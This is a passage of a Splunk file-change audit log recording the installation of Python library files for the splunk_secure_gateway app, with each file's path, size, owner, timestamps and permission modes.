isdir=0, size=39250, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.081, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/searchcommands/reporting_command.py", isdir=0, size=9697, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.078, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/searchcommands/internals.py", isdir=0, size=28746, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.074, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/searchcommands/generating_command.py", isdir=0, size=17670, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.069, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/searchcommands/external_search_command.py", isdir=0, size=7872, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.066, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/searchcommands/eventing_command.py", isdir=0, size=5432, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.062, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/searchcommands/environment.py", isdir=0, size=4683, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.058, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/searchcommands/decorators.py", isdir=0, size=15728, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:29.052, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/searchcommands/__init__.py", isdir=0, size=6037, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.947, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/modularinput/__pycache__/validation_definition.cpython-37.pyc", isdir=0, size=2413, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:28.943, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/modularinput/__pycache__/utils.cpython-37.pyc", isdir=0, size=1687, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:28.939, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/modularinput/__pycache__/script.cpython-37.pyc", isdir=0, size=5462, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:28.935, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/modularinput/__pycache__/scheme.cpython-37.pyc", isdir=0, size=2265, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:28.930, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/modularinput/__pycache__/input_definition.cpython-37.pyc", isdir=0, size=1631, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:28.926, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/modularinput/__pycache__/event_writer.cpython-37.pyc", isdir=0, size=2739, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:28.921, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/modularinput/__pycache__/event.cpython-37.pyc", isdir=0, size=3710, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:28.916, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/modularinput/__pycache__/argument.cpython-37.pyc", isdir=0, size=3387, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:28.912, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/modularinput/__pycache__/__init__.cpython-37.pyc", isdir=0, size=648, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:28.807, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/modularinput/validation_definition.py", isdir=0, size=2775, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.803, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/modularinput/utils.py", isdir=0, size=2642, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.799, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/modularinput/script.py", isdir=0, size=6597, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.795, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/modularinput/scheme.py", isdir=0, size=3073, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.789, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/modularinput/input_definition.py", isdir=0, size=1888, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.784, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/modularinput/event_writer.py", isdir=0, size=2885, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.781, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/modularinput/event.py", isdir=0, size=4456, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.775, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/modularinput/argument.py", isdir=0, size=4219, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.767, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/modularinput/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:28.763, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/modularinput/__init__.py", isdir=0, size=400, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-rw-rw-", hash=] Audit:[timestamp=10-06-2022 17:42:28.658, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/__pycache__/six.cpython-37.pyc", isdir=0, size=26859, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:28.654, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/__pycache__/data.cpython-37.pyc", isdir=0, size=7283, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:28.651, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/__pycache__/client.cpython-37.pyc", isdir=0, size=132009, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:28.647, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/__pycache__/binding.cpython-37.pyc", isdir=0, size=50516, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:28.643, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/__pycache__/__init__.cpython-37.pyc", isdir=0, size=381, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:28.539, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/six.py", isdir=0, size=34074, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.536, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/searchcommands", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:28.532, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/results.py", isdir=0, size=10820, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.527, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/ordereddict.py", isdir=0, size=4223, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.522, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/modularinput", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:28.516, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/data.py", isdir=0, size=8528, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.512, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/client.py", isdir=0, size=143072, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.509, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/binding.py", isdir=0, size=58046, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.503, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:28.497, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/splunklib/__init__.py", isdir=0, size=772, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.491, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_protocol/__pycache__/websocket_pb2.cpython-37.pyc", isdir=0, size=6848, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:28.487, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_protocol/__pycache__/sb_common_pb2.cpython-37.pyc", isdir=0, size=7229, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:28.483, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_protocol/__pycache__/http_pb2.cpython-37.pyc", isdir=0, size=34603, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:28.479, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_protocol/__pycache__/__init__.cpython-37.pyc", isdir=0, size=166, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:28.376, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_protocol/websocket_pb2.py", isdir=0, size=16725, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.372, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_protocol/sb_common_pb2.py", isdir=0, size=16133, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.367, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_protocol/registration_v2_pb2.py", isdir=0, size=50748, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.363, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_protocol/http_pb2.py", isdir=0, size=101512, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.357, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_protocol/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:28.354, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/spacebridge_protocol/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.350, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/certifi/core.py", isdir=0, size=2303, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.346, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/certifi/cacert.pem", isdir=0, size=263774, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.343, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/certifi/__main__.py", isdir=0, size=243, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.339, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/certifi/__init__.py", isdir=0, size=62, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.233, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/semver-2.13.0.dist-info/top_level.txt", isdir=0, size=7, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.228, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/semver-2.13.0.dist-info/entry_points.txt", isdir=0, size=42, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.224, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/semver-2.13.0.dist-info/WHEEL", isdir=0, size=110, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.216, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/semver-2.13.0.dist-info/REQUESTED", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.206, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/semver-2.13.0.dist-info/RECORD", isdir=0, size=847, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.200, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/semver-2.13.0.dist-info/METADATA", isdir=0, size=5041, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.197, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/semver-2.13.0.dist-info/LICENSE.txt", isdir=0, size=1496, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.190, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/semver-2.13.0.dist-info/INSTALLER", isdir=0, size=4, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.185, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/types/newstr.py", isdir=0, size=15758, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.181, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/types/newrange.py", isdir=0, size=5294, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.177, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/types/newopen.py", isdir=0, size=810, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.172, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/types/newobject.py", isdir=0, size=3358, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.168, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/types/newmemoryview.py", isdir=0, size=712, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.164, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/types/newlist.py", isdir=0, size=2284, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.160, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/types/newint.py", isdir=0, size=13286, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.155, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/types/newdict.py", isdir=0, size=3100, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.136, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/types/newbytes.py", isdir=0, size=16303, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.131, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/types/__init__.py", isdir=0, size=6831, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.026, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/http/server.py", isdir=0, size=45523, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.020, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/http/cookies.py", isdir=0, size=21581, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.016, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/http/cookiejar.py", isdir=0, size=76559, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.012, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/http/client.py", isdir=0, size=47602, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:28.008, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/http/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.904, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/urllib/robotparser.py", isdir=0, size=6865, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.900, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/urllib/response.py", isdir=0, size=3180, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.896, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/urllib/request.py", isdir=0, size=96276, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-rw-rw-", hash=] Audit:[timestamp=10-06-2022 17:42:27.892, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/urllib/parse.py", isdir=0, size=35792, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-rw-rw-", hash=] Audit:[timestamp=10-06-2022 17:42:27.888, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/urllib/error.py", isdir=0, size=2715, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.884, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/urllib/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.880, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/xmlrpc/server.py", isdir=0, size=37285, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.876, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/xmlrpc/client.py", isdir=0, size=48133, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.872, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/xmlrpc/__init__.py", isdir=0, size=38, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.766, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/test/support.py", isdir=0, size=70881, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.762, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/test/ssl_servers.py", isdir=0, size=7209, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.759, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/test/ssl_key.pem", isdir=0, size=916, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.754, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/test/ssl_key.passwd.pem", isdir=0, size=963, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.750, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/test/ssl_cert.pem", isdir=0, size=867, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.747, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/test/sha256.pem", isdir=0, size=8344, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.743, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/test/pystone.py", isdir=0, size=7427, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.739, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/test/nullcert.pem", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.736, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/test/nullbytecert.pem", isdir=0, size=5435, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.732, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/test/nokia.pem", isdir=0, size=1923, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.729, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/test/keycert2.pem", isdir=0, size=1795, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.725, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/test/keycert.pem", isdir=0, size=1783, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.721, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/test/keycert.passwd.pem", isdir=0, size=1830, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.718, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/test/https_svn_python_org_root.pem", isdir=0, size=2569, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.712, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/test/dh512.pem", isdir=0, size=402, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.707, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/test/badkey.pem", isdir=0, size=2162, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.704, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/test/badcert.pem", isdir=0, size=1928, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:27.698, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports/test/__init__.py", isdir=0, 